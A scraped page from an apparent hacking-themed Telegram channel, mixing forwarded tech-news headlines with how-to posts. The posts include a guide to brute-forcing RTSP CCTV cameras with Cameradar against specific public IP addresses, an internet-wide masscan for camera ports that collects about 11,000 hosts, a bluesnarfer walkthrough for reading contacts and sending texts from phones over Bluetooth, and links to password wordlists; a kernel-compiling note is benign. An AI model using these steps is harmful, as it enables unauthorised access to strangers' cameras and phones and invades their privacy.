UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEFORE HACK CCTV; What is RTSP USED FOR ANY CCTV, and what is it for :

1) Real-time streaming protocol (born real time streaming protocol, abbr RTSP..) - application protocol for use in systems that work with multimedia data (media content, media content), and allows you to remotely control the flow of data from the server, providing the ability to execute commands , such as start (start), pause (pause) and stop (stop) broadcasting (playing) of multimedia content, as well as time access to files located on the server.

2) RTSP does not perform compression, nor does it define the media encapsulation method and transport protocols. Streaming data is not itself part of the RTSP protocol. Most RTSP servers use a standard real-time transport protocol for this, which carries audio and video data.

3) Not only can RTSP be found in IP cameras, other devices can also use this protocol to stream media (video and audio).

4) To play video using the RTSP protocol, you need to know the source URL, as well as the username and password.

Β» Example address:

one
rtsp://118.39.210.69/rtsp_tunnel?h26x=4&line=1&inst=1
Some RTSP servers are configured to allow access to the media stream without a password.

The URL address of the media stream is not standard, devices send it when connected after authorization.

Usually RTSP runs on 554, 5554 and 8554 protocols.

Video from IP cameras via RTSP protocol can be opened in VLC and Mplayer . How to do it is written in the article " How to record video from an IP camera (RTSP stream) ". It also shows you how to record streaming video.

VLC and Mplayer players are able to work with this protocol thanks to the openRTSP utility , RTSP client for receiving and recording streaming media ".

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Facebook shuts several branches in Ireland in tax scandal Fermented.
#International
Forwarded from UNDERCODE NEWS
Google "Ascending Strike": from every perspective to preserve the three-dimensional effect of illumination, 2D becomes "4D"
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Brute force RTSP-HACK CAMERA FROM IP:
As already mentioned BEFORE THIS MESSAGE, the URI ("page" address) at which the media stream is available differs from device to device. That is, if you do not have credentials for authentication using the RTSP protocol, then to get the route (URL) of the media stream, you will have to search for it by brute force.

1) You can look at the variety of addresses at https://www.ispyconnect.com/sources.aspx .

2) Program Cameradar able to search for the source address and select the user's password. As stated in the description, Cameradar hacks RTSP CCTV cameras.

Cameradar allows you to:

A) Detect open RTSP hosts on any available target host

B) Determine which device model is broadcasting

C) Launch automatic dictionary attacks to find the route of their flow (ex: /live.sdp)

D) Launch automatic dictionary attacks to guess camera username and password

E)Receive a complete and convenient report on the results
To install the program, see the page https://kali.tools/?p=6132

πŸ¦‘The launch is very simple:


1) cameradar -t Π₯ОБВ
The " -t , --targets " option sets the target. The target can be a file listing hosts or network ranges, IP address, IP range, subnet, or a combination of both. Example: --targets = "192.168.1.72,192.168.1.74"

2) The program makes a lot of requests and if some of them fail, it displays these errors on the screen, as a result of which the output becomes cluttered, so I prefer to add " 2> / dev / null " to the command .

Examples of successful launches:

cameradar -t 201.191.170.250 2>/dev/null

cameradar -t 98.124.38.218 2>/dev/null

3) The description of the program mentions "nmap", but this is Cameradar's own library, it is written in Go and has nothing to do with the original Nmap network scanner - perhaps this is the reason for such slowness.

4) You can scan the network to collect Cameradar targets, for example, using Masscan :

> > sudo masscan 0.0.0.0/0 --exclude 255.255.255.255 --randomize-hosts --rate 200 -p 554,5554,8554 --output-filename cameras.xml
The following commands create the β€œ camera ” directory and filter all IP addresses from cameras * .xml files into camera / hosts.txt file .

> > mkdir camera
cat cameras*.xml | grep -o -E '[0-9]{1,}\.[0-9]{1,}\.[0-9]{1,}\.[0-9]{1,}' | sort | uniq > camera/hosts.txt
Counting the number of IP addresses on which at least one port from 554, 5554 and 855 is open.

> >cat camera/hosts.txt | wc -l
> > 10955

(Don't copy our tips)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Modern search engine engineers have clarified how they can destroy Google.
#Updates
Forwarded from UNDERCODE NEWS
Bitcoin is expected to hit the longest consecutive month since 2019 since smashing the milestone.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

Hack bluetooth with kali :
Bluesnarfing, all modern devices have at least some kind of protection against bluesnarfing. For example, I tested this with a Samsung Galaxy s7, and it prompted be to give permission to bluesnarfer to read my contacts, make calls, etc. So at least it asked me for permission!

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

To install bluesnarfer:

1) git clone https://github.com/kimbo/bluesnarfer.git

2) cd bluesnarfer

3) make

4) ./bluesnarfer.

5) First, you need to make sure you can reach the device from your computer. Connect your computer to your phone with Bluetooth, then verify you can reach it using something like l2ping:

l2ping <MAC_ADDRESS>

6) If you're having trouble finding the MAC_ADDRESS, usually you'll be able to see it in your bluetooth settings. I also like to use bluetoothctl and then devices list and it'll show you what devices have been picked up by the scanner or paired previously and what their MAC addresses are.

7) Next, you run the bluesnarfer program. The general usage is

./bluesnarfer -b <MAC_ADDR> [options]
For example, to list device info, run

./bluesnarfer -b <MAC_ADDR> -i
Once you get that working, you can test a bunch of AT commands (read contacts, read recent calls, make calls, send text messages, etc). Here's a good reference I found for AT commands: https://www.sparkfun.com/datasheets/Cellular%20Modules/AT_Commands_Reference_Guide_r0.pdf (Note that your phone may not support all of the AT commands listed in the reference guide.)

8) If running the above command doesn't work, you probably need to figure out the right channel to use. The default channel used is 17 (see src/bluesnarfer.c#L59).

To see what channels are available, I used the sdptool:

sdptool browse --tree --l2cap <MAC_ADDRESS>

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
The version of WeChat PC adapts to domestic operating systems and supports domestic CPUs
#Updates
Forwarded from UNDERCODE NEWS
2020 is coming to an end and Adobe alerts consumers that Flash support will be discontinued too.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘bEST Wordlist Generator :

> > [Cupp](https://github.com/Mebus/cupp.git)

> >WordlistCreator](https://github.com/Z4nzu/wlcreator)

> >[Goblin WordGenerator](https://github.com/UndeadSec/GoblinWordGenerator.git)

> >[Password list (1.4 Billion Clear Text Password)](https://github.com/Viralmaniar/SMWYG-Show-Me-What-You-Got)

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
In order to demonstrate the initial iPhone production line, Netizens released old images from 2007.
#Technologies
Forwarded from UNDERCODE NEWS
Dridex attackers aim for holiday season and spray fake Amazon gift cards.
#Malwares
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

How to Compile the kernel :

1.
tar -Jxv -f linux**.tar.xz -C /target
cd /target
make help

2. make config || make oldconfig || make allyesconfig || make menuconfig || make xconfig
then it generats a .config file.

3. make -j N
N jobs co-work.

4. # make modules_install or make deb-pkg

5. # make install or dpkg -i xx.deb

*note* that,
menuconfig.dependency : libncurse5, libncurse5-dev
xconfig.dependency : qt4-?

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Is the web search style in Windows 10 too anti-human? Teaching you how to absolutely shut it down.
#Updates
Forwarded from UNDERCODE NEWS
Python continues to be popular.
#Updates
Forwarded from UNDERCODE NEWS
High-risk Windows vulnerability, Microsoft has actually been neglecting it for a year.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Intel's sales this year will hit 75 billion US dollars, the highest results in 52 years.
#Technologies